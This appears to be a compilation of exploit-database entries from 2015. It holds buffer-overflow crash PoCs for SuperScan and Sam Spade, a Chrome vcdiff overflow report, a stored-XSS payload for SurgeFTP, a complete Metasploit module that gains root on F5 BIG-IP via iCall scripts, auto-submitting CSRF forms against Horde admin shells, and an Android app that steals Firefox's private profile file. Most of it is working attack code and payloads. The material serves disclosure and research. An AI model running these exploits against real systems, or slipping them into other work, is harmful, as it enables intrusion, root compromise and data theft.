
-
SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow
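#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title : SuperScan 4.1 Tools Hostname/IP/URL Field Buffer Overflow Crash PoC
# Discovery by : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date : 18/11/2015
# Vendor Homepage : http://www.foundstone.com
# Software Link : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version : 4.1
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash:
# 1.- Run python code : python super_scan_4.1_tools.py
# 2.- Open super_scan_4.1_tools.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Tools > Hostname/IP/URL
# 5.- Clic on button -> Whois
# 6.- Crashed
#
# Local DoS only: the PoC overwrites the saved return address with 0x42424242
# and stops there; no controlled code execution is demonstrated.

# 280 bytes of filler ('A'), then the 4 bytes that land in EIP ('B').
buffer = "\x41" * 280
eip = "\x42" * 4


def build_payload():
    """Return the crash string written to the PoC file (280 x 'A' + 4 x 'B')."""
    return buffer + eip


def main():
    # 'with' guarantees the file is closed even if the write fails.
    with open("super_scan_4.1_tools.txt", "w") as f:
        f.write(build_payload())


if __name__ == "__main__":
    main()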
-
Sam Spade 1.14 - Decode URL Buffer Overflow Crash (PoC)
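#!/usr/bin/env python
# Exploit Title : Sam Spade 1.14 Decode URL Buffer Overflow Crash PoC
# Discovery by : Vivek Mahajan - c3p70r
# Discovery Date : 19/11/2015
# Vendor Homepage : http://samspade.org
# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version : 1.14
# Vulnerability Type: Denial of Service / Proof Of Concept/ Memory Overwrite
# Tested On : Windows XP SP2 ,Windows 7 SP1 x64, Windows 8.1 x64 PRO, Windows 10 x64
# Crash Point : Go to Tools > Decode URL> Enter the contents of 'spade.txt' > OK , Note: Do Remove the http://
#
# Crash-only PoC: 510 bytes of 'A' pasted into the Decode URL dialog. Nothing
# about control of EIP or code execution is shown here.

# The overflow string.
buffer = "A" * 510


def main():
    # The original read open("spade.txt, 'w') -- an unterminated string literal
    # that does not even parse. Fixed, and 'with' closes the file on any error.
    # 'file' is also no longer used as a variable name (it shadows a builtin).
    with open("spade.txt", "w") as fh:
        fh.write(buffer)


if __name__ == "__main__":
    main()

# Follow on twitter @vik.create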
-
Google Chrome - open-vcdiff Out-of-Bounds Read in Browser Process Integer Overflow
// Source: https://code.google.com/p/google-security-research/issues/detail?id=513
//
// There's an integer overflow issue in sanity checking section lengths when
// parsing the vcdiff format (used in SDCH content encoding). This results in
// the parser parsing outside of sane memory bounds when parsing the contents
// of a vcdiff window - see attached crash PoC.
//
// (/src/sdch/open-vcdiff/src/headerparser.cc)
//
// Parses the three section lengths (and the optional Adler32 checksum) of a
// vcdiff window header and checks that, together with the header bytes already
// consumed, they equal the window's delta encoding length. The parsed lengths
// are written through the out-pointers. Returns false with return_code_ set
// on a parse failure, on an internal ordering error, or on a length mismatch.
bool VCDiffHeaderParser::ParseSectionLengths(
    bool has_checksum,
    size_t* add_and_run_data_length,
    size_t* instructions_and_sizes_length,
    size_t* addresses_length,
    VCDChecksum* checksum) {
  ParseSize("length of data for ADDs and RUNs", add_and_run_data_length);  // <---- user controlled
  ParseSize("length of instructions section", instructions_and_sizes_length);  // <---- user controlled
  ParseSize("length of addresses for COPYs", addresses_length);  // <---- user controlled
  if (has_checksum) {
    ParseChecksum("Adler32 checksum value", checksum);
  }
  if (RESULT_SUCCESS != return_code_) {
    return false;
  }
  if (!delta_encoding_start_) {
    VCD_DFATAL << "Internal error: VCDiffHeaderParser::ParseSectionLengths "
                  "was called before ParseWindowLengths" << VCD_ENDL;
    return_code_ = RESULT_ERROR;
    return false;
  }
  const size_t delta_encoding_header_length =
      UnparsedData() - delta_encoding_start_;
  // NOTE(review): the three lengths are each attacker-controlled and are only
  // validated as a sum. On a 32-bit build the size_t addition below can wrap,
  // so the equality can hold even though one length on its own exceeds the
  // window. A fix needs to bound each length (and the running total) against
  // delta_encoding_length_ - delta_encoding_header_length before this test.
  if (delta_encoding_length_ !=
          (delta_encoding_header_length +
           *add_and_run_data_length +
           *instructions_and_sizes_length +
           *addresses_length)) {  // <---- Integer overflow here (32-bit systems only)
    VCD_ERROR << "The length of the delta encoding does not match "
                 "the size of the header plus the sizes of the data sections"
              << VCD_ENDL;
    return_code_ = RESULT_ERROR;
    return false;
  }
  return true;
}

// These returned lengths are subsequently used to initialise length-checked
// buffer objects for continuing the parsing (vcdecoder.cc:1024)
size_t add_and_run_data_length = 0;
size_t instructions_and_sizes_length = 0;
size_t addresses_length = 0;
if (!header_parser->ParseSectionLengths(has_checksum_,
                                        &add_and_run_data_length,
                                        &instructions_and_sizes_length,
                                        &addresses_length,
                                        &expected_checksum_)) {
  return header_parser->GetResult();
}
if (parent_->AllowInterleaved() &&
    // snip...
} else {
  // If interleaved format is not used, then the whole window contents
  // must be available before decoding can begin.  If only part of
  // the current window is available, then report end of data
  // and re-parse the whole header when DecodeChunk() is called again.
  //
  // NOTE(review): this availability check uses the same wrapped sum, so an
  // oversized individual length passes it too and is then handed straight to
  // Init() below; that is presumably where the out-of-bounds read seen in the
  // crash trace originates.
  if (header_parser->UnparsedSize() <
          (add_and_run_data_length +
           instructions_and_sizes_length +
           addresses_length)) {
    return RESULT_END_OF_DATA;
  }
  data_for_add_and_run_.Init(header_parser->UnparsedData(),
                             add_and_run_data_length);
  instructions_and_sizes_.Init(data_for_add_and_run_.End(),
                               instructions_and_sizes_length);
  addresses_for_copy_.Init(instructions_and_sizes_.End(),
                           addresses_length);

// This issue only affects 32-bit builds, since ParseSize is parsing a positive
// int32_t; on 64-bit builds it cannot be large enough to wrap a size_t.
//
// It's unclear if this is exploitable as a browser-process infoleak; the
// results of SDCH decoding will be returned to a renderer process, but the way
// that the returned values are used mean that it is likely that the process
// will have to survive reads at opposite ends of the address space, which
// *should* be guaranteed to crash with a 2:2 address space split. It is
// possible that on 32-bit Windows with a 1:3 address space split this can be
// survived, or with careful crafting of the input file these reads can be
// avoided; I've not investigated further at this point.
//
// It appears to be necessary to host the PoC on a legitimate domain; as
// localhost is not supported for SDCH.
//
// VERSION
// Chrome Version: 47.0.2499.0
// Operating System: Linux x86
//
// REPRODUCTION CASE
// Please include a demonstration of the security bug, such as an attached HTML
// or binary file that reproduces the bug when loaded in Chrome. PLEASE make the
// file as small as possible and remove any content not required to demonstrate
// the bug.
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION Type of crash: browser Crash State: eax 0xf9ae8a78 -106001800 ecx 0xe7502d43 -414175933 edx 0x7b83e020 2072240160 ebx 0xf76597a0 -144336992 esp 0xe75025d0 0xe75025d0 ebp 0xe7502798 0xe7502798 esi 0x5 5 edi 0xf9061200 -117042688 eip 0xf1ddebee 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94> eflags 0x210a93 [ CF AF SF IF OF RF ID ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x63 99 => 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94>: movzbl (%edx),%ecx 0xf1ddebf1 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+97>: mov (%edi),%esi 0xf1ddebf3 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+99>: cmpb $0x0,0x100(%esi,%ecx,1) 0xf1ddebfb <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+107>: je 0xf1ddec06 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+118> 0xf1ddebfd <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+109>: movsbl %cl,%edx #0 open_vcdiff::VCDiffCodeTableReader::GetNextInstruction (this=0xf9061200, size=0x5, mode=0xf9ae8a78 " \340\203{Ox\a\376\001") at ../../sdch/open-vcdiff/src/decodetable.cc:78 #1 0xf1ddcab5 in open_vcdiff::VCDiffDeltaFileWindow::DecodeBody (this=0xf90611c4, parseable_chunk=<optimized out>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1231 #2 0xf1ddbc8b in open_vcdiff::VCDiffDeltaFileWindow::DecodeWindow (this=0xf90611c4, parseable_chunk=0xe75031a8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1359 #3 0xf1ddb6f0 in open_vcdiff::VCDiffStreamingDecoderImpl::DecodeChunk (this=0xf90611b0, data=<optimized out>, len=<optimized out>, output_string=0x8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:887 #4 0xf1ddd499 in open_vcdiff::VCDiffStreamingDecoder::DecodeChunkToInterface (this=0x8b, data=0xe7503300 "8\026B\367\030'\317", <incomplete 
sequence \371\226>, len=3880792832, output_string=0xf76597a0 <_GLOBAL_OFFSET_TABLE_>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1393 #5 0xf1d2b17f in DecodeChunk<std::basic_string<char> > (this=0x7b83e020, data=<optimized out>, len=3880791363, output=<optimized out>) at ../../sdch/open-vcdiff/src/google/vcdecoder.h:83 #6 net::SdchFilter::ReadFilteredData (this=0xf9cf26e0, dest_buffer=0xd2ce0000 "", dest_len=<optimized out>) at ../../net/filter/sdch_filter.cc:424 #7 0xf1d28990 in net::Filter::ReadData (this=0xf9cf26e0, dest_buffer=0x7b83e020 <error: Cannot access memory at address 0x7b83e020>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:131 #8 0xf1d2895c in net::Filter::ReadData (this=0xfd6b7c00, dest_buffer=<optimized out>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:145 #9 0xf1ca8dde in net::URLRequestJob::ReadFilteredData (this=0xf9891a00, bytes_read=<optimized out>) at ../../net/url_request/url_request_job.cc:673 #10 0xf1ca8c1d in net::URLRequestJob::Read (this=0xf9891a00, buf=<optimized out>, buf_size=<optimized out>, bytes_read=0xe75034fc) at ../../net/url_request/url_request_job.cc:126 Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38763.zip
-
Netwin SurgeFTP Server 23d6 - Persistent Cross-Site Scripting
******************************************************************************************** # Exploit Netwin SurgeFTP Server Stored Cross Site Scripting Vulnerabilities # Date: 11/18/2015 # Exploit Author: Un_N0n # Vendor: NetWin # Software Link: http://netwinsite.com/cgi-bin/keycgi.exe?cmd=download&product=surgeftp # Version: 23d6 # Tested on: Windows 7 x64(64bit) ******************************************************************************************** [Info] The SurgeFTP web interface suffers from multiple Stored XSS vulnerabilities. They are: Stored XSS in 'Domain Name' field. [How to?] 1. Open SurgeFTP web interface, Click on global option from the menu. 2. Add a new domain, in 'Domain Name' field, add in this(<img src=x onmouseover=alert(1)>) payload. 3. Save, then navigate to main page, hover mouse over 'broken image' in 'domains' section. Stored XSS in 'Mirrors'. [How to?] 1. Open surgeftp web interface, Click on 'Mirrors' option from the menu. 2. Click on Add Mirror, in 'Local path' & 'Remote Host' field add in this(<img src=x onmouseover=alert(1)>) payload. 3. Save, then navigate to 'Mirror' page again, Hover mouse over the 'broken image' in 'local path' & 'remote host' field. Previously, somebody else reported Stored XSS vulnerabilities in SurgeFTP. The vendor tried to fix them by blacklisting only the literal <script>alert('blah')</script> payload, which is not a good practice: the same vulnerability is triggered simply by entering a different XSS payload (an event-handler attribute on an <img> tag, as above, needs no <script> element at all). The correct fix is to whitelist the characters allowed in these fields and, more importantly, to HTML-encode the stored values at the point where they are rendered into the page.
-
F5 iControl - 'iCall::Script' Root Command Execution (Metasploit)
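##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'nokogiri'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # SOAP-encoding attribute placed on every iControl operation element.
  SOAPENV_ENCODINGSTYLE = { "soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/" }
  # Attributes for an iControl Common.StringSequence (array of strings) argument.
  STRING_ATTRS = {
    'xsi:type' => 'urn:Common.StringSequence',
    'soapenc:arrayType' => 'xsd:string[]',
    'xmlns:urn' => 'urn:iControl'
  }
  # Attributes for an iControl Common.ULongSequence (array of longs) argument.
  LONG_ATTRS = {
    'xsi:type' => 'urn:Common.ULongSequence',
    'soapenc:arrayType' => 'xsd:long[]',
    'xmlns:urn' => 'urn:iControl'
  }

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "F5 iControl iCall::Script Root Command Execution",
        'Description' => %q{
          This module exploits an authenticated privilege escalation vulnerability in the
          iControl API on the F5 BIG-IP LTM (and likely other F5 devices). This requires
          valid credentials and the Resource Administrator role. The exploit should work
          on BIG-IP 11.3.0 - 11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see
          references for more details)
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'tom', # Discovery, Metasploit module
          'Jon Hart <jon_hart[at]rapid7.com>' # Metasploit module
        ],
        'References' => [
          ['CVE', '2015-3628'],
          ['URL', 'https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html'],
          ['URL', 'https://gdssecurity.squarespace.com/labs/2015/9/8/f5-icallscript-privilege-escalation-cve-2015-3628.html']
        ],
        'Platform' => ['unix'],
        'Arch' => ARCH_CMD,
        'Targets' => [
          ['F5 BIG-IP LTM 11.x', {}]
        ],
        'Privileged' => true,
        'DisclosureDate' => "Sep 3 2015",
        'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/iControl/iControlPortal.cgi']),
        OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
      ])

    register_advanced_options(
      [
        OptInt.new('SESSION_WAIT', [ true, 'The max time to wait for a session, in seconds', 5 ]),
        OptString.new('PATH', [true, 'Filesystem path for the dropped payload', '/tmp']),
        OptString.new('FILENAME', [false, 'File name of the dropped payload, defaults to random']),
        OptInt.new('ARG_MAX', [true, 'Command line length limit', 131072])
      ])
  end

  # Chooses where the payload is dropped on the target: PATH/FILENAME, or
  # PATH/.<16 random alphanumerics> when FILENAME is not set.
  def setup
    file = datastore['FILENAME']
    file ||= ".#{Rex::Text.rand_text_alphanumeric(16)}"
    @payload_path = ::File.join(datastore['PATH'], file)
    super
  end

  # Builds a SOAP envelope (returned as an XML string) whose Body is filled in
  # by the given block.
  def build_xml
    builder = Nokogiri::XML::Builder.new do |xml|
      xml.Envelope do
        xml = xml_add_namespaces(xml)
        xml['soapenv'].Header
        xml['soapenv'].Body do
          yield xml
        end
      end
    end
    builder.to_xml
  end

  # Declares, on the document root, the envelope/schema namespaces plus the
  # iCall Script ('scr') and PeriodicHandler ('per') interface namespaces.
  def xml_add_namespaces(xml)
    ns = xml.doc.root.add_namespace_definition("soapenv", "http://schemas.xmlsoap.org/soap/envelope/")
    xml.doc.root.namespace = ns
    xml.doc.root.add_namespace_definition("xsi", "http://www.w3.org/2001/XMLSchema-instance")
    xml.doc.root.add_namespace_definition("xsd", "http://www.w3.org/2001/XMLSchema")
    xml.doc.root.add_namespace_definition("scr", "urn:iControl:iCall/Script")
    xml.doc.root.add_namespace_definition("soapenc", "http://schemas.xmlsoap.org/soap/encoding")
    xml.doc.root.add_namespace_definition("per", "urn:iControl:iCall/PeriodicHandler")
    xml
  end

  # POSTs a SOAP payload to TARGETURI using the USERNAME/PASSWORD credentials.
  # Returns the response object, or false when no response was received.
  def send_soap_request(pay)
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path),
      'method' => 'POST',
      'data' => pay,
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    )
    if res
      return res
    else
      vprint_error('No response')
    end
    false
  end

  # iCall::Script.create -- registers a script called +name+ whose definition
  # (the Tcl/shell body that will run as root) is +cmd+.
  def create_script(name, cmd)
    create_xml = build_xml do |xml|
      xml['scr'].create(SOAPENV_ENCODINGSTYLE) do
        xml.scripts(STRING_ATTRS) do
          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
          xml.item name
        end
        xml.definitions(STRING_ATTRS) do
          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
          xml.item cmd
        end
      end
    end
    send_soap_request(create_xml)
  end

  # iCall::Script.delete_script -- removes the script. A failed cleanup leaves a
  # root-executing script behind on the appliance, so both "no response" and a
  # non-200 status are reported (the original only reported the former).
  def delete_script(script_name)
    delete_xml = build_xml do |xml|
      xml['scr'].delete_script(SOAPENV_ENCODINGSTYLE) do
        xml.scripts(STRING_ATTRS) do
          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
          xml.item script_name
        end
      end
    end
    res = send_soap_request(delete_xml)
    unless res && res.code == 200
      print_error("Error while cleaning up script #{script_name}")
    end
    res
  end

  # True when iCall::Script.get_list reports /Common/<script_name>.
  def script_exists?(script_name)
    exists_xml = build_xml do |xml|
      xml['scr'].get_list(SOAPENV_ENCODINGSTYLE)
    end
    res = send_soap_request(exists_xml)
    res && res.code == 200 && res.body =~ Regexp.new("/Common/#{script_name}")
  end

  # iCall::PeriodicHandler.create -- schedules +script_name+ to run. Returns
  # true when the server acknowledges the handler, false otherwise.
  def create_handler(handler_name, script_name)
    print_status("Creating trigger #{handler_name}")
    handler_xml = build_xml do |xml|
      xml['per'].create(SOAPENV_ENCODINGSTYLE) do
        xml.handlers(STRING_ATTRS) do
          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
          xml.item handler_name
        end
        xml.scripts(STRING_ATTRS) do
          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
          xml.item script_name
        end
        xml.intervals(LONG_ATTRS) do
          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
          # we set this to run once every 24h, but because there is no
          # start/end time it will run once, more or less immediately, and
          # again 24h from now, but by that point hopefully we will have
          # cleaned up and the handler/script/etc are gone
          xml.item 60 * 60 * 24
        end
      end
    end
    res = send_soap_request(handler_xml)
    if res
      if res.code == 200 && res.body =~ Regexp.new("iCall/PeriodicHandler")
        true
      else
        print_error("Trigger creation failed -- HTTP/#{res.proto} #{res.code} #{res.message}")
        false
      end
    else
      print_error("No response to trigger creation")
      false
    end
  end

  # iCall::PeriodicHandler.delete_handler -- removes the handler. As with
  # delete_script, a non-200 status is treated as a failed cleanup.
  def delete_handler(handler_name)
    delete_xml = build_xml do |xml|
      xml['per'].delete_handler(SOAPENV_ENCODINGSTYLE) do
        xml.handlers(STRING_ATTRS) do
          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
          xml.item handler_name
        end
      end
    end
    res = send_soap_request(delete_xml)
    unless res && res.code == 200
      print_error("Error while cleaning up handler #{handler_name}")
    end
    res
  end

  # True when iCall::PeriodicHandler.get_list reports /Common/<handler_name>.
  def handler_exists?(handler_name)
    handler_xml = build_xml do |xml|
      xml['per'].get_list(SOAPENV_ENCODINGSTYLE)
    end
    res = send_soap_request(handler_xml)
    res && res.code == 200 && res.body =~ Regexp.new("/Common/#{handler_name}")
  end

  def check
    # strategy: we'll send a create_script request, with empty name:
    # if everything is ok, the server return a 500 error saying it doesn't like empty names
    # if the user doesn't have enough privileges, a 500 error is also returned, but saying
    #   'access denied' (per the original author's note -- the exact body text is not
    #   confirmed here); that says nothing about the patch level, so report Unknown
    #   rather than Safe
    # if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable
    # any other response is considered not vulnerable
    res = create_script('', '')
    if res && res.code == 500 && res.body =~ /path is empty/
      return Exploit::CheckCode::Appears
    elsif res && res.code == 500 && res.body =~ /access denied/i
      print_warning("HTTP/#{res.proto} #{res.code} #{res.message} -- access denied; does USERNAME have the Resource Administrator role?")
      return Exploit::CheckCode::Unknown
    elsif res && res.code == 401
      print_warning("HTTP/#{res.proto} #{res.code} #{res.message} -- incorrect USERNAME or PASSWORD?")
      return Exploit::CheckCode::Unknown
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    # phase 1: create iCall script to create file with payload, execute it and remove it.
    # The payload is base64-encoded, so shell_cmd contains no characters that could
    # break out of the double-quoted sh -c argument below.
    shell_cmd = %(echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{@payload_path}; chmod +x #{@payload_path};#{@payload_path})
    cmd = %(exec /bin/sh -c "#{shell_cmd}")
    arg_max = datastore['ARG_MAX']
    if shell_cmd.size > arg_max
      print_error "Payload #{datastore['PAYLOAD']} is too big, try a different payload "\
        "or increasing ARG_MAX (note that payloads bigger than the target's configured ARG_MAX value may fail to execute)"
      return false
    end

    script_name = "script-#{Rex::Text.rand_text_alphanumeric(16)}"
    print_status("Uploading payload script #{script_name}")
    unless (create_script_res = create_script(script_name, cmd))
      print_error("No response when uploading payload script")
      return false
    end
    unless create_script_res.code == 200
      print_error("Upload payload script failed -- HTTP/#{create_script_res.proto} "\
        "#{create_script_res.code} #{create_script_res.message}")
      return false
    end
    unless script_exists?(script_name)
      print_error("Payload script uploaded successfully but script was not found")
      return false
    end
    register_file_for_cleanup @payload_path

    # phase 2: create iCall Handler, that will actually run the previously created script
    handler_name = "handler-#{Rex::Text.rand_text_alphanumeric(16)}"
    unless create_handler(handler_name, script_name)
      delete_script(script_name)
      return false
    end
    unless handler_exists?(handler_name)
      print_error("Trigger created successfully but was not found")
      delete_script(script_name)
      return false
    end

    print_status('Waiting for payload to execute...')
    # if our payload has not been successfully executed just yet, wait
    # until it does or give up
    slept = 0
    until session_created? || slept > datastore['SESSION_WAIT']
      Rex.sleep(1)
      slept += 1
    end
    unless session_created?
      # The handler fires asynchronously on the appliance, so a session may still
      # arrive after we give up; cleanup is attempted regardless.
      print_warning("No session after #{slept}s (SESSION_WAIT=#{datastore['SESSION_WAIT']}); cleaning up anyway")
    end

    print_status('Trying cleanup...')
    delete_script(script_name)
    delete_handler(handler_name)
  end
end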
-
Horde Groupware 5.2.10 - Cross-Site Request Forgery
Advisory ID: HTB23272 Product: Horde Groupware Vendor: http://www.horde.org Vulnerable Version(s): 5.2.10 and probably prior Tested Version: 5.2.10 Advisory Publication: September 30, 2015 [without technical details] Vendor Notification: September 30, 2015 Vendor Patch: October 22, 2015 Public Disclosure: November 18, 2015 Vulnerability Type: Cross-Site Request Forgery [CWE-352] CVE Reference: CVE-2015-7984 Risk Level: High CVSSv3 Base Score: 8.3 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered three Cross-Site Request Forgery (CSRF) vulnerabilities in Horde Groupware, a popular collaboration suite used by a variety of companies around the world. These vulnerabilities are very dangerous, since they can be used in targeted attacks against corporate clients. An attacker might be able to gain unauthorized access to information stored in the database, execute arbitrary commands on the server, compromise the entire application and perform attacks against application users and the company’s infrastructure. All three affected scripts are administrative consoles that are intentionally capable of command, SQL and PHP execution; the flaw is that each of them acts on a forged cross-origin POST that carries the administrator's session cookie, without any check that the request originated from the application itself (such as an anti-CSRF token). 1) Cross-Site Request Forgery in Horde Groupware: CVE-2015-7984 1.1 The vulnerability exists due to failure in the "/admin/cmdshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary system commands on the server. The CSRF exploit below sends an HTTP POST request to the vulnerable script and instructs it to display the output of the "/bin/ls" command. 
As a result, you will see contents of "/admin/" directory: <form action="http://[host]/admin/cmdshell.php" method="post" name="main"> <input type="hidden" name="cmd" value="ls"> <input value="submit" id="btn" type="submit" /> </form> <script> document.getElementById('btn').click(); </script> 1.2 The vulnerability exists due to failure in the "/admin/sqlshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary SQL queries with application’s database. The exploit code below executes "SELECT version()" query and displays version of current MySQL server: <form action="http://[host]/admin/sqlshell.php" method="post" name="main"> <input type="hidden" name="sql" value="SELECT version()"> <input value="submit" id="btn" type="submit" /> </form> <script> document.getElementById('btn').click(); </script> 1.3 The vulnerability exists due to failure in the "/admin/phpshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary php code on the server. 
The exploit code below executes the "phpinfo()" function and displays its output: <form action="http://[host]/admin/phpshell.php" method="post" name="main"> <input type="hidden" name="app" value="horde"> <input type="hidden" name="php" value="phpinfo();"> <input value="submit" id="btn" type="submit" /> </form> <script> document.getElementById('btn').click(); </script> ----------------------------------------------------------------------------------------------- Solution: Update to Horde Groupware 5.2.11 More Information: http://lists.horde.org/archives/announce/2015/001137.html ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23272 - https://www.htbridge.com/advisory/HTB23272 - Multiple CSRF Vulnerabilities in Horde Groupware. [2] Horde Groupware - http://www.horde.org - Horde Groupware is a free, enterprise ready, browser based collaboration suite. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
-
Mozilla Firefox 9.0.1 - Same Origin Policy Security Bypass
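// source: https://www.securityfocus.com/bid/62480/info
//
// Mozilla Firefox is prone to a security-bypass vulnerability. Attackers can
// exploit this issue to bypass the same-origin policy and certain access
// restrictions to access data, or execute arbitrary script code in the browser
// of an unsuspecting user in the context of another site. This could be used to
// steal sensitive information or launch other attacks.
//
// Note: This issue was previously discussed in BID 62447 (Mozilla
// Firefox/Thunderbird/SeaMonkey MFSA 2013-76 through -92 Multiple
// Vulnerabilities), but has been moved to its own record to better document it.
//
// This issue is fixed in Firefox 24.0.
//
// PoC (Android). A malicious app has Firefox for Android open a world-readable
// HTML file from the app's own data directory, then swaps that file for a
// symbolic link to Firefox's private profiles.ini. The page's delayed
// XMLHttpRequest to its own URL (document.URL) then reads the symlink target,
// i.e. a file belonging to another app, from the file:// page. The original
// listing had the leading "pa" of the package declaration truncated; restored.
package jp.mbsd.terada.attackfirefox1;

import android.net.Uri;
import android.os.Bundle;
import android.app.Activity;
import android.content.Intent;

public class MainActivity extends Activity {
    public final static String MY_PKG = "jp.mbsd.terada.attackfirefox1";
    // Scratch directory under this app's private data; chmod 777'd below so the
    // Firefox process (a different UID) can open the file.
    public final static String MY_TMP_DIR = "/data/data/" + MY_PKG + "/tmp/";
    public final static String HTML_PATH = MY_TMP_DIR + "A" + Math.random() + ".html";
    public final static String TARGET_PKG = "org.mozilla.firefox";
    // The victim app's private file that the PoC reads out.
    public final static String TARGET_FILE_PATH = "/data/data/" + TARGET_PKG + "/files/mozilla/profiles.ini";
    // Page content: 8 s after load it XHRs its own URL and alerts the response;
    // by then doit() has replaced the file with the symlink.
    public final static String HTML = "<u>Wait a few seconds.</u>" +
        "<script>" +
        "function doit() {" +
        " var xhr = new XMLHttpRequest;" +
        " xhr.onload = function() {" +
        " alert(xhr.responseText);" +
        " };" +
        " xhr.open('GET', document.URL);" +
        " xhr.send(null);" +
        "}" +
        "setTimeout(doit, 8000);" +
        "</script>";

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        doit();
    }

    // Stages the attack: write the page, open it in Firefox, then swap it for a
    // symlink. Failures are deliberately swallowed (PoC only). The Thread.sleep()
    // calls run on the UI thread, so the activity is unresponsive for ~5 s; the
    // sleeps are also the only ordering between the fire-and-forget shell
    // commands in cmdexec() and Firefox's load of the page.
    public void doit() {
        try {
            // create a malicious HTML
            cmdexec("mkdir " + MY_TMP_DIR);
            cmdexec("echo \"" + HTML + "\" > " + HTML_PATH);
            cmdexec("chmod -R 777 " + MY_TMP_DIR);
            Thread.sleep(1000);
            // force Firefox to load the malicious HTML
            invokeFirefox("file://" + HTML_PATH);
            Thread.sleep(4000);
            // replace the HTML with a symbolic link to profiles.ini
            cmdexec("rm " + HTML_PATH);
            cmdexec("ln -s " + TARGET_FILE_PATH + " " + HTML_PATH);
        } catch (Exception e) {}
    }

    // Asks Firefox (addressed explicitly by component name) to view the URL.
    public void invokeFirefox(String url) {
        Intent intent = new Intent(Intent.ACTION_VIEW, Uri.parse(url));
        intent.setClassName(TARGET_PKG, TARGET_PKG + ".App");
        startActivity(intent);
    }

    // Runs cmd via /system/bin/sh -c. The process is not waited for and errors
    // are ignored, so a failed step shows up only as a missing effect.
    public void cmdexec(String cmd) {
        try {
            String[] tmp = new String[] {"/system/bin/sh", "-c", cmd};
            Runtime.getRuntime().exec(tmp);
        } catch (Exception e) {}
    }
}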
-
WordPress Plugin RokIntroScroller - 'thumb.php' Multiple Vulnerabilities
